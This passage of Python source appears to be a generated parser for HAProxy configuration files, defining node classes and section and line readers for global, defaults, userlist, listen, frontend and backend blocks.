super(BindLine, self).__init__(text, offset, elements)
self.whitespace = elements[4]
self.service_address = elements[3]
self.line_break = elements[7]
self.value = elements[5]
class AclLine(TreeNode):
def __init__(self, text, offset, elements):
super(AclLine, self).__init__(text, offset, elements)
self.whitespace = elements[4]
self.acl_name = elements[3]
self.line_break = elements[7]
self.value = elements[5]
class BackendLine(TreeNode):
def __init__(self, text, offset, elements):
super(BackendLine, self).__init__(text, offset, elements)
self.whitespace = elements[6]
self.backend_name = elements[3]
self.line_break = elements[9]
self.operator = elements[5]
self.backend_condition = elements[7]
self.backendtype = elements[1]
class GroupLine(TreeNode):
def __init__(self, text, offset, elements):
super(GroupLine, self).__init__(text, offset, elements)
self.whitespace = elements[4]
self.group_name = elements[3]
self.line_break = elements[8]
self.users_fragment = elements[6]
class TreeNode19(TreeNode):
def __init__(self, text, offset, elements):
super(TreeNode19, self).__init__(text, offset, elements)
self.whitespace = elements[1]
class UserLine(TreeNode):
def __init__(self, text, offset, elements):
super(UserLine, self).__init__(text, offset, elements)
self.whitespace = elements[8]
self.user_name = elements[3]
self.password = elements[7]
self.line_break = elements[12]
self.groups_fragment = elements[10]
self.passwd_type = elements[5]
class TreeNode21(TreeNode):
def __init__(self, text, offset, elements):
super(TreeNode21, self).__init__(text, offset, elements)
self.whitespace = elements[1]
class ConfigLine(TreeNode):
def __init__(self, text, offset, elements):
super(ConfigLine, self).__init__(text, offset, elements)
self.whitespace = elements[3]
self.keyword = elements[2]
self.line_break = elements[6]
self.value = elements[4]
class CommentLine(TreeNode):
def __init__(self, text, offset, elements):
super(CommentLine, self).__init__(text, offset, elements)
self.whitespace = elements[0]
self.comment_text = elements[1]
self.line_break = elements[2]
class BlankLine(TreeNode):
def __init__(self, text, offset, elements):
super(BlankLine, self).__init__(text, offset, elements)
self.whitespace = elements[0]
self.line_break = elements[1]
class Keyword(TreeNode):
def __init__(self, text, offset, elements):
super(Keyword, self).__init__(text, offset, elements)
self.whitespace = elements[1]
class ServiceAddress(TreeNode):
def __init__(self, text, offset, elements):
super(ServiceAddress, self).__init__(text, offset, elements)
self.host = elements[0]
self.port = elements[2]
class ParseError(SyntaxError):
pass
FAILURE = object()
class Grammar(object):
REGEX_1 = re.compile('^[\\n]')
REGEX_2 = re.compile('^[a-z0-9\\-\\_\\.]')
REGEX_3 = re.compile('^[a-zA-z0-9\\-\\_\\.:]')
REGEX_4 = re.compile('^[a-zA-z0-9\\-\\_\\.:]')
REGEX_5 = re.compile('^[a-zA-z0-9\\-\\_\\.:]')
REGEX_6 = re.compile('^[a-zA-z0-9\\-\\_\\.:]')
REGEX_7 = re.compile('^[a-zA-z0-9\\-\\_\\.:]')
REGEX_8 = re.compile('^[^#\\n ]')
REGEX_9 = re.compile('^[^#\\n]')
REGEX_10 = re.compile('^[:]')
REGEX_11 = re.compile('^[\\d]')
REGEX_12 = re.compile('^[\\d]')
REGEX_13 = re.compile('^[\\d]')
REGEX_14 = re.compile('^[\\d]')
REGEX_15 = re.compile('^[\\d]')
REGEX_16 = re.compile('^[a-zA-Z\\-\\.\\d]')
REGEX_17 = re.compile('^[a-zA-Z0-9\\-\\_\\.:]')
REGEX_18 = re.compile('^[^#\\n]')
REGEX_19 = re.compile('^[\\n]')
REGEX_20 = re.compile('^[ \\t]')
REGEX_21 = re.compile('^[ \\t]')
def _read_configuration(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['configuration'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
remaining0, index1, elements0, address1 = 0, self._offset, [], True
while address1 is not FAILURE:
index2 = self._offset
address1 = self._read_comment_line()
if address1 is FAILURE:
self._offset = index2
address1 = self._read_blank_line()
if address1 is FAILURE:
self._offset = index2
address1 = self._read_global_section()
if address1 is FAILURE:
self._offset = index2
address1 = self._read_defaults_section()
if address1 is FAILURE:
self._offset = index2
address1 = self._read_userlist_section()
if address1 is FAILURE:
self._offset = index2
address1 = self._read_listen_section()
if address1 is FAILURE:
self._offset = index2
address1 = self._read_frontend_section()
if address1 is FAILURE:
self._offset = index2
address1 = self._read_backend_section()
if address1 is FAILURE:
self._offset = index2
if address1 is not FAILURE:
elements0.append(address1)
remaining0 -= 1
if remaining0 <= 0:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
else:
address0 = FAILURE
self._cache['configuration'][index0] = (address0, self._offset)
return address0
def _read_global_section(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['global_section'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_global_header()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
address2 = self._read_config_block()
if address2 is not FAILURE:
elements0.append(address2)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = GlobalSection(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['global_section'][index0] = (address0, self._offset)
return address0
def _read_defaults_section(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['defaults_section'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_defaults_header()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
address2 = self._read_config_block()
if address2 is not FAILURE:
elements0.append(address2)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = DefaultsSection(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['defaults_section'][index0] = (address0, self._offset)
return address0
def _read_userlist_section(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['userlist_section'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_userlist_header()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
address2 = self._read_config_block()
if address2 is not FAILURE:
elements0.append(address2)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = UserlistSection(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['userlist_section'][index0] = (address0, self._offset)
return address0
def _read_listen_section(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['listen_section'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_listen_header()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
address2 = self._read_config_block()
if address2 is not FAILURE:
elements0.append(address2)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = ListenSection(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['listen_section'][index0] = (address0, self._offset)
return address0
def _read_frontend_section(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['frontend_section'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_frontend_header()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
address2 = self._read_config_block()
if address2 is not FAILURE:
elements0.append(address2)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = FrontendSection(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['frontend_section'][index0] = (address0, self._offset)
return address0
def _read_backend_section(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['backend_section'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_backend_header()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
address2 = self._read_config_block()
if address2 is not FAILURE:
elements0.append(address2)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = BackendSection(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['backend_section'][index0] = (address0, self._offset)
return address0
def _read_global_header(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['global_header'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_whitespace()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 6]
if chunk0 == 'global':
address2 = TreeNode(self._input[self._offset:self._offset + 6], self._offset)
self._offset = self._offset + 6
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"global"')
if address2 is not FAILURE:
elements0.append(address2)
address3 = FAILURE
address3 = self._read_whitespace()
if address3 is not FAILURE:
elements0.append(address3)
address4 = FAILURE
index2 = self._offset
address4 = self._read_comment_text()
if address4 is FAILURE:
address4 = TreeNode(self._input[index2:index2], index2)
self._offset = index2
if address4 is not FAILURE:
elements0.append(address4)
address5 = FAILURE
address5 = self._read_line_break()
if address5 is not FAILURE:
elements0.append(address5)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = GlobalHeader(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['global_header'][index0] = (address0, self._offset)
return address0
def _read_userlist_header(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['userlist_header'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_whitespace()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 8]
if chunk0 == 'userlist':
address2 = TreeNode(self._input[self._offset:self._offset + 8], self._offset)
self._offset = self._offset + 8
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"userlist"')
if address2 is not FAILURE:
elements0.append(address2)
address3 = FAILURE
address3 = self._read_whitespace()
if address3 is not FAILURE:
elements0.append(address3)
address4 = FAILURE
address4 = self._read_proxy_name()
if address4 is not FAILURE:
elements0.append(address4)
address5 = FAILURE
index2 = self._offset
address5 = self._read_comment_text()
if address5 is FAILURE:
address5 = TreeNode(self._input[index2:index2], index2)
self._offset = index2
if address5 is not FAILURE:
elements0.append(address5)
address6 = FAILURE
address6 = self._read_line_break()
if address6 is not FAILURE:
elements0.append(address6)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = UserlistHeader(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['userlist_header'][index0] = (address0, self._offset)
return address0
def _read_defaults_header(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['defaults_header'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_whitespace()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 8]
if chunk0 == 'defaults':
address2 = TreeNode(self._input[self._offset:self._offset + 8], self._offset)
self._offset = self._offset + 8
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"defaults"')
if address2 is not FAILURE:
elements0.append(address2)
address3 = FAILURE
address3 = self._read_whitespace()
if address3 is not FAILURE:
elements0.append(address3)
address4 = FAILURE
index2 = self._offset
address4 = self._read_proxy_name()
if address4 is FAILURE:
address4 = TreeNode(self._input[index2:index2], index2)
self._offset = index2
if address4 is not FAILURE:
elements0.append(address4)
address5 = FAILURE
address5 = self._read_whitespace()
if address5 is not FAILURE:
elements0.append(address5)
address6 = FAILURE
index3 = self._offset
address6 = self._read_comment_text()
if address6 is FAILURE:
address6 = TreeNode(self._input[index3:index3], index3)
self._offset = index3
if address6 is not FAILURE:
elements0.append(address6)
address7 = FAILURE
address7 = self._read_line_break()
if address7 is not FAILURE:
elements0.append(address7)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = DefaultsHeader(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['defaults_header'][index0] = (address0, self._offset)
return address0
def _read_listen_header(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['listen_header'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_whitespace()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 6]
if chunk0 == 'listen':
address2 = TreeNode(self._input[self._offset:self._offset + 6], self._offset)
self._offset = self._offset + 6
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"listen"')
if address2 is not FAILURE:
elements0.append(address2)
address3 = FAILURE
address3 = self._read_whitespace()
if address3 is not FAILURE:
elements0.append(address3)
address4 = FAILURE
address4 = self._read_proxy_name()
if address4 is not FAILURE:
elements0.append(address4)
address5 = FAILURE
address5 = self._read_whitespace()
if address5 is not FAILURE:
elements0.append(address5)
address6 = FAILURE
index2 = self._offset
address6 = self._read_service_address()
if address6 is FAILURE:
address6 = TreeNode(self._input[index2:index2], index2)
self._offset = index2
if address6 is not FAILURE:
elements0.append(address6)
address7 = FAILURE
index3 = self._offset
address7 = self._read_value()
if address7 is FAILURE:
address7 = TreeNode(self._input[index3:index3], index3)
self._offset = index3
if address7 is not FAILURE:
elements0.append(address7)
address8 = FAILURE
index4 = self._offset
address8 = self._read_comment_text()
if address8 is FAILURE:
address8 = TreeNode(self._input[index4:index4], index4)
self._offset = index4
if address8 is not FAILURE:
elements0.append(address8)
address9 = FAILURE
address9 = self._read_line_break()
if address9 is not FAILURE:
elements0.append(address9)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = ListenHeader(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['listen_header'][index0] = (address0, self._offset)
return address0
def _read_frontend_header(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['frontend_header'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_whitespace()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 8]
if chunk0 == 'frontend':
address2 = TreeNode(self._input[self._offset:self._offset + 8], self._offset)
self._offset = self._offset + 8
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"frontend"')
if address2 is not FAILURE:
elements0.append(address2)
address3 = FAILURE
address3 = self._read_whitespace()
if address3 is not FAILURE:
elements0.append(address3)
address4 = FAILURE
address4 = self._read_proxy_name()
if address4 is not FAILURE:
elements0.append(address4)
address5 = FAILURE
address5 = self._read_whitespace()
if address5 is not FAILURE:
elements0.append(address5)
address6 = FAILURE
index2 = self._offset
address6 = self._read_service_address()
if address6 is FAILURE:
address6 = TreeNode(self._input[index2:index2], index2)
self._offset = index2
if address6 is not FAILURE:
elements0.append(address6)
address7 = FAILURE
index3 = self._offset
address7 = self._read_value()
if address7 is FAILURE:
address7 = TreeNode(self._input[index3:index3], index3)
self._offset = index3
if address7 is not FAILURE:
elements0.append(address7)
address8 = FAILURE
index4 = self._offset
address8 = self._read_comment_text()
if address8 is FAILURE:
address8 = TreeNode(self._input[index4:index4], index4)
self._offset = index4
if address8 is not FAILURE:
elements0.append(address8)
address9 = FAILURE
address9 = self._read_line_break()
if address9 is not FAILURE:
elements0.append(address9)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = FrontendHeader(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['frontend_header'][index0] = (address0, self._offset)
return address0
def _read_backend_header(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['backend_header'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_whitespace()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 7]
if chunk0 == 'backend':
address2 = TreeNode(self._input[self._offset:self._offset + 7], self._offset)
self._offset = self._offset + 7
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"backend"')
if address2 is not FAILURE:
elements0.append(address2)
address3 = FAILURE
address3 = self._read_whitespace()
if address3 is not FAILURE:
elements0.append(address3)
address4 = FAILURE
address4 = self._read_proxy_name()
if address4 is not FAILURE:
elements0.append(address4)
address5 = FAILURE
address5 = self._read_whitespace()
if address5 is not FAILURE:
elements0.append(address5)
address6 = FAILURE
index2 = self._offset
address6 = self._read_value()
if address6 is FAILURE:
address6 = TreeNode(self._input[index2:index2], index2)
self._offset = index2
if address6 is not FAILURE:
elements0.append(address6)
address7 = FAILURE
index3 = self._offset
address7 = self._read_comment_text()
if address7 is FAILURE:
address7 = TreeNode(self._input[index3:index3], index3)
self._offset = index3
if address7 is not FAILURE:
elements0.append(address7)
address8 = FAILURE
address8 = self._read_line_break()
if address8 is not FAILURE:
elements0.append(address8)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = BackendHeader(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['backend_header'][index0] = (address0, self._offset)
return address0
def _read_config_block(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['config_block'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
remaining0, index1, elements0, address1 = 0, self._offset, [], True
while address1 is not FAILURE:
index2 = self._offset
address1 = self._read_server_line()
if address1 is FAILURE:
self._offset = index2
address1 = self._read_option_line()
if address1 is FAILURE:
self._offset = index2
address1 = self._read_bind_line()
if address1 is FAILURE:
self._offset = index2
address1 = self._read_acl_line()
if address1 is FAILURE:
self._offset = index2
address1 = self._read_backend_line()
if address1 is FAILURE:
self._offset = index2
address1 = self._read_group_line()
if address1 is FAILURE:
self._offset = index2
address1 = self._read_user_line()
if address1 is FAILURE:
self._offset = index2
address1 = self._read_config_line()
if address1 is FAILURE:
self._offset = index2
address1 = self._read_comment_line()
if address1 is FAILURE:
self._offset = index2
address1 = self._read_blank_line()
if address1 is FAILURE:
self._offset = index2
if address1 is not FAILURE:
elements0.append(address1)
remaining0 -= 1
if remaining0 <= 0:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
else:
address0 = FAILURE
self._cache['config_block'][index0] = (address0, self._offset)
return address0
def _read_server_line(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['server_line'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_whitespace()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 7]
if chunk0 == 'server ':
address2 = TreeNode(self._input[self._offset:self._offset + 6], self._offset)
self._offset = self._offset + 6
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"server"')
if address2 is not FAILURE:
elements0.append(address2)
address3 = FAILURE
address3 = self._read_whitespace()
if address3 is not FAILURE:
elements0.append(address3)
address4 = FAILURE
address4 = self._read_server_name()
if address4 is not FAILURE:
elements0.append(address4)
address5 = FAILURE
address5 = self._read_whitespace()
if address5 is not FAILURE:
elements0.append(address5)
address6 = FAILURE
address6 = self._read_service_address()
if address6 is not FAILURE:
elements0.append(address6)
address7 = FAILURE
index2 = self._offset
address7 = self._read_value()
if address7 is FAILURE:
address7 = TreeNode(self._input[index2:index2], index2)
self._offset = index2
if address7 is not FAILURE:
elements0.append(address7)
address8 = FAILURE
index3 = self._offset
address8 = self._read_comment_text()
if address8 is FAILURE:
address8 = TreeNode(self._input[index3:index3], index3)
self._offset = index3
if address8 is not FAILURE:
elements0.append(address8)
address9 = FAILURE
address9 = self._read_line_break()
if address9 is not FAILURE:
elements0.append(address9)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = ServerLine(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['server_line'][index0] = (address0, self._offset)
return address0
def _read_option_line(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['option_line'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_whitespace()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 6]
if chunk0 == 'option':
address2 = TreeNode(self._input[self._offset:self._offset + 6], self._offset)
self._offset = self._offset + 6
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"option"')
if address2 is not FAILURE:
elements0.append(address2)
address3 = FAILURE
address3 = self._read_whitespace()
if address3 is not FAILURE:
elements0.append(address3)
address4 = FAILURE
address4 = self._read_keyword()
if address4 is not FAILURE:
elements0.append(address4)
address5 = FAILURE
address5 = self._read_whitespace()
if address5 is not FAILURE:
elements0.append(address5)
address6 = FAILURE
index2 = self._offset
address6 = self._read_value()
if address6 is FAILURE:
address6 = TreeNode(self._input[index2:index2], index2)
self._offset = index2
if address6 is not FAILURE:
elements0.append(address6)
address7 = FAILURE
index3 = self._offset
address7 = self._read_comment_text()
if address7 is FAILURE:
address7 = TreeNode(self._input[index3:index3], index3)
self._offset = index3
if address7 is not FAILURE:
elements0.append(address7)
address8 = FAILURE
address8 = self._read_line_break()
if address8 is not FAILURE:
elements0.append(address8)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = OptionLine(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['option_line'][index0] = (address0, self._offset)
return address0
def _read_bind_line(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['bind_line'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_whitespace()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 4]
if chunk0 == 'bind':
address2 = TreeNode(self._input[self._offset:self._offset + 4], self._offset)
self._offset = self._offset + 4
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"bind"')
if address2 is not FAILURE:
elements0.append(address2)
address3 = FAILURE
address3 = self._read_whitespaceplus()
if address3 is not FAILURE:
elements0.append(address3)
address4 = FAILURE
address4 = self._read_service_address()
if address4 is not FAILURE:
elements0.append(address4)
address5 = FAILURE
address5 = self._read_whitespace()
if address5 is not FAILURE:
elements0.append(address5)
address6 = FAILURE
index2 = self._offset
address6 = self._read_value()
if address6 is FAILURE:
address6 = TreeNode(self._input[index2:index2], index2)
self._offset = index2
if address6 is not FAILURE:
elements0.append(address6)
address7 = FAILURE
index3 = self._offset
address7 = self._read_comment_text()
if address7 is FAILURE:
address7 = TreeNode(self._input[index3:index3], index3)
self._offset = index3
if address7 is not FAILURE:
elements0.append(address7)
address8 = FAILURE
address8 = self._read_line_break()
if address8 is not FAILURE:
elements0.append(address8)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = BindLine(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['bind_line'][index0] = (address0, self._offset)
return address0
def _read_acl_line(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['acl_line'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_whitespace()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 3]
if chunk0 == 'acl':
address2 = TreeNode(self._input[self._offset:self._offset + 3], self._offset)
self._offset = self._offset + 3
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"acl"')
if address2 is not FAILURE:
elements0.append(address2)
address3 = FAILURE
address3 = self._read_whitespace()
if address3 is not FAILURE:
elements0.append(address3)
address4 = FAILURE
address4 = self._read_acl_name()
if address4 is not FAILURE:
elements0.append(address4)
address5 = FAILURE
address5 = self._read_whitespace()
if address5 is not FAILURE:
elements0.append(address5)
address6 = FAILURE
index2 = self._offset
address6 = self._read_value()
if address6 is FAILURE:
address6 = TreeNode(self._input[index2:index2], index2)
self._offset = index2
if address6 is not FAILURE:
elements0.append(address6)
address7 = FAILURE
index3 = self._offset
address7 = self._read_comment_text()
if address7 is FAILURE:
address7 = TreeNode(self._input[index3:index3], index3)
self._offset = index3
if address7 is not FAILURE:
elements0.append(address7)
address8 = FAILURE
address8 = self._read_line_break()
if address8 is not FAILURE:
elements0.append(address8)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = AclLine(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['acl_line'][index0] = (address0, self._offset)
return address0
def _read_backend_line(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['backend_line'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
address1 = self._read_whitespace()
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
index2 = self._offset
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 11]
if chunk0 == 'use_backend':
address2 = TreeNode(self._input[self._offset:self._offset + 11], self._offset)
self._offset = self._offset + 11
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"use_backend"')
if address2 is FAILURE:
self._offset = index2
chunk1 = None
if self._offset < self._input_size:
chunk1 = self._input[self._offset:self._offset + 15]
if chunk1 == 'default_backend':
address2 = TreeNode(self._input[self._offset:self._offset + 15], self._offset)
self._offset = self._offset + 15
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"default_backend"')
if address2 is FAILURE:
self._offset = index2
if address2 is not FAILURE:
elements0.append(address2)
address3 = FAILURE
address3 = self._read_whitespace()
if address3 is not FAILURE:
elements0.append(address3)
address4 = FAILURE
address4 = self._read_backend_name()
if address4 is not FAILURE:
elements0.append(address4)
address5 = FAILURE
address5 = self._read_whitespace()
if address5 is not FAILURE:
elements0.append(address5)
address6 = FAILURE
index3 = self._offset
index4 = self._offset
chunk2 = None
if self._offset < self._input_size:
chunk2 = self._input[self._offset:self._offset + 2]
if chunk2 == 'if':
address6 = TreeNode(self._input[self._offset:self._offset + 2], self._offset)
self._offset = self._offset + 2
else:
address6 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"if"')
if address6 is FAILURE:
self._offset = index4
chunk3 = None
if self._offset < self._input_size:
